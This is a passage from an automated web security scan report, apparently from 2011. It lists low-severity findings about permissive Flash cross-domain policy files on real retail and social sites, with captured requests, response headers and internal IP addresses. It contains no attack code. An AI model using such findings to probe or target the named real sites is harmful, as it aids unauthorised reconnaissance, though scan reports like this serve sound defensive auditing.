<allow-access-from domain="*.axelscript.com"/>
<allow-access-from domain="*.sherwin.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.sherwin-williams.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.resource.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*flashmaxx.com"/>
<allow-access-from domain="searsfb.indelible.tv"/>
<allow-access-from domain="*.serving-sys.com"/>
<allow-access-from domain="*.modea.com"/>
<allow-access-from domain="*.mizunousa.com"/>
<allow-access-from domain="*.mizunorunning.com"/>
<allow-access-from domain="*.mizunocda.com"/>
<allow-access-from domain="*.footjoy.com"/>
<allow-access-from domain="*.footjoy.co.uk"/>
<allow-access-from domain="*.footjoy.com.fr"/>
<allow-access-from domain="*.footjoy.de"/>
<allow-access-from domain="*.footjoy.se"/>
<allow-access-from domain="*.footjoy.ca"/>
<allow-access-from domain="*.footjoy.com.au"/>
<allow-access-from domain="*.footjoy.jp"/>
<allow-access-from domain="*.footjoy.co.th"/>
<allow-access-from domain="*.footjoy.com.my"/>
<allow-access-from domain="*.footjoy.com.sg"/>
<allow-access-from domain="*.footjoy.co.kr"/>
<allow-access-from domain="*.footjoy.com.cn"/>
<allow-access-from domain="pitchinteractive.com"/>
<allow-access-from domain="*.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="flashmaxx.com" secure="true" />
...[SNIP]...
<allow-access-from domain="searsfb.indelible.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ec2-184-72-166-175.compute-1.amazonaws.com"/>
<allow-access-from domain="*.getpapered.com"/>
<allow-access-from domain="*.englishpapercompany.com"/>
<allow-access-from domain="*.koolsquare.net"/>
<allow-access-from domain="*.target.com"/>
<allow-access-from domain="*.home.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cos.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.lvld.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cp.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.at" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.be" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ca" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ch" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.hu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.il" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.in" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.jp" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.kr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.nz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.th" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.co.uk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ar" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.au" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.br" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.cn" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.co" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.hk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.mx" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.my" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pe" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ph" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.pr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.sg" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.tw" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.com.ve" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.cz" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.de" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.dk" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ee" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.es" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fi" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.fr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.gr" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ie" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.it" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.lu" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.nl" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.no" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.pt" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.ru" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.se" secure="true" />
...[SNIP]...
<allow-access-from domain="www.agilent.us" secure="true" />
...[SNIP]...
<allow-access-from domain="*.brooksbrothers.com"/>
<allow-access-from domain="*.whitneyenglish.com"/>
<allow-access-from domain="canadiantire.ca"/>
<allow-access-from domain="*.maxnow.com"/>
<allow-access-from domain="4.59.112.158"/>
<allow-access-from domain="*.nike.com"/>
<allow-access-from domain="*.converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="converse.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cust.aops-eds.com"/>
<allow-access-from domain="*.colehaan.com"/>
<allow-access-from domain="kobe.nike.jess3.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.highschoolsports.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="kb24.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.skysports.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.lequipe.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="converse.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="staging.groundctrl.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovation.digitas.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="siteinnovationdev.digitas.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.ny.rga.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.nikedev.framfab.dk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.akqa.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ostkcdn.com"/>
<allow-access-from domain="*.aggregateknowledge.com"/>
<allow-access-from domain="*.nikedev.com"/>
<allow-access-from domain="anthrode.uat.venda.com"/>
<allow-access-from domain="anthropologie.custqa.venda.com"/>
<allow-access-from domain="*.fingerhut.com"/>
<allow-access-from domain="*.gettington.com"/>
...[SNIP]...

6.70. https://secure.homedepot.ca/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.homedepot.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 07:35:35 GMT
Content-Type: text/xml
Date: Mon, 16 May 2011 02:10:40 GMT
Content-Length: 339
Connection: close
Cache-Control: max-age=315360000
Expires: Wed, 12 May 2021 22:48:47 GMT

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.homedepot.ca" />    <allow-access-from domain="*.startaconversation.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.71. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.30.147.196
X-Cnection: close
Date: Mon, 16 May 2011 10:34:08 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.72. http://subscriptions.marvel.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://subscriptions.marvel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:32 GMT
Server: Apache
Vary: Accept-Encoding
X-ServerNickName: Venom
Content-Length: 417
Connection: close
Content-Type: text/x-cross-domain-policy; charset=utf-8

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.marvel.com" h
...[SNIP]...
<allow-access-from domain="i.annihil.us" />
<allow-access-from domain="*.marvel.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.73. https://subscriptions.marvel.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://subscriptions.marvel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: subscriptions.marvel.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:36:24 GMT
Server: Apache
Vary: Accept-Encoding
X-ServerNickName: Cap
Content-Length: 417
Connection: close
Content-Type: text/x-cross-domain-policy; charset=utf-8

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.marvel.com" h
...[SNIP]...
<allow-access-from domain="i.annihil.us" />
<allow-access-from domain="*.marvel.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.2mdn.net" />
...[SNIP]...

6.74. http://www.acehardware.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:54:36 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:54:36 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.75. https://www.acehardware.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.acehardware.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.acehardware.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:12:28 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "4e411c-2ba-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 698
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:12:28 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.acehardware.com" />

...[SNIP]...
<allow-access-from domain="ace.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="preview.gsipartners.com" />
<allow-access-from domain="172.20.1.195" />
<allow-access-from domain="172.21.1.195" />
<allow-access-from domain="206.16.220.195" />
<allow-access-from domain="63.240.110.195" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.76. http://www.armaniexchange.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.armaniexchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:43 GMT
ETag: "206-a0b786c0"
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Mon, 16 May 2011 02:05:22 GMT
Date: Mon, 16 May 2011 01:55:22 GMT
Content-Length: 518
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.overlay.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ax-life.com" />
<allow-access-from domain="ii.armaniexchange.com" />
<allow-access-from domain="ii.marketlive.com" />
<allow-access-from domain=" origin-ii-prod-rw.marketlive.com" />
<allow-access-from domain="ii1-rev-rw.marketlive.com" />
...[SNIP]...

6.77. https://www.armaniexchange.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.armaniexchange.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.armaniexchange.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 04 May 2011 19:54:43 GMT
ETag: "206-a0b786c0"
Content-Type: application/xml
Cache-Control: max-age=600
Expires: Mon, 16 May 2011 02:23:16 GMT
Date: Mon, 16 May 2011 02:13:16 GMT
Content-Length: 518
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.overlay.tv" secure="true" />
...[SNIP]...
<allow-access-from domain="ax-life.com" />
<allow-access-from domain="ii.armaniexchange.com" />
<allow-access-from domain="ii.marketlive.com" />
<allow-access-from domain=" origin-ii-prod-rw.marketlive.com" />
<allow-access-from domain="ii1-rev-rw.marketlive.com" />
...[SNIP]...

6.78. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.42.208.77
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

6.79. http://www.ftd.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=4859AF2A7F5F107F0010D25B2EEAFAE4; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=4859AF2A7F5F107F0010D25B2EEAFAE4; Path=/; Domain=.ftd.com; expires=Mon, 16-05-2021 01:53:23 GMT
Vary: Accept-Encoding
Last-Modified: Wed, 13 Apr 2011 04:16:29 GMT
ETag: "fb-4da5239d"
Content-Type: text/xml
Content-Length: 251
Date: Mon, 16 May 2011 01:53:23 GMT
X-Varnish: 747078534
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ftd.com" />
<allow-access-from domain="*.ftdimg.com" />
...[SNIP]...

6.80. http://www.gnc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:57:16 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 405
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:57:16 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-access-from domain="gnc.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.81. https://www.gnc.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.gnc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.gnc.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:14:13 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 14 Oct 2010 08:47:00 GMT
ETag: "6781c1-195-4928fc0d4e900"
Accept-Ranges: bytes
Content-Length: 405
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 02:14:13 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="gnc.com" />
<allow-access-from domain="gnc.imageg.net" />
<allow-access-from domain="*.gspt.net" />
<allow-access-from domain="*.gsipartners.com" />
<allow-access-from domain="*.fetchback.com"/>
...[SNIP]...

6.82. http://www.homedepot.ca/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.homedepot.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.homedepot.ca

Response

HTTP/1.0 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 31 Jan 2011 07:35:36 GMT
Content-Type: text/xml
Date: Mon, 16 May 2011 01:53:26 GMT
Content-Length: 339
Connection: close
Cache-Control: max-age=315360000
Expires: Mon, 10 May 2021 10:46:15 GMT

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*.homedepot.ca" />    <allow-access-from domain="*.startaconversation.com" />
   <allow-access-from domain="*.brightcove.com" />
...[SNIP]...

6.83. http://www.petsmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:53:01 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Thu, 08 May 2008 01:49:36 GMT
ETag: "53c78d-30d-44cae4b2b6c00"
Accept-Ranges: bytes
Content-Length: 781
Cache-Control: max-age=172800
Expires: Wed, 18 May 2011 01:53:01 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.petsmart.com" secu
...[SNIP]...
<allow-access-from domain="*.petsmart.com" secure="true" />
...[SNIP]...
<allow-access-from domain="pet.imageg.net" />
<allow-access-from domain="*.gspt.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.gsipartners.com" secure="true" />
...[SNIP]...
<allow-access-from domain="172.20.1.172" />
<allow-access-from domain="172.21.1.172" />
<allow-access-from domain="206.16.220.172" />
<allow-access-from domain="63.240.110.172" />
<allow-access-from domain="preview.gsipartners.com" secure="true" />
...[SNIP]...

6.84. https://www.petsmart.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.petsmart.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.petsmart.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 10:17:47 GMT
Server: Apache/2.0.63 (Unix)
